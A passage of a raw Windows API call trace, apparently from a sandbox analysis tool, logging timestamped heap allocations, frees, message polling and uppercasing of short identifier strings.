hHeap=0x25c0000) returned 1 [0160.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0160.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0160.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0160.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0160.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0160.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0160.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0160.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0160.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.839] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0160.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0160.840] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0160.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0160.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0160.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0160.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.840] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0160.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0160.841] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0160.841] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0160.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c48 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa950 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0160.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.842] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0160.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0160.843] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0160.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0160.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0160.843] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.843] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0160.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.844] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.844] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0160.845] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.845] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0160.845] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0160.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.845] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0160.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.845] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0160.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0160.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0160.846] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0160.847] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0160.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0160.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0160.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0160.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0160.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.848] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.848] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0160.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0160.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: 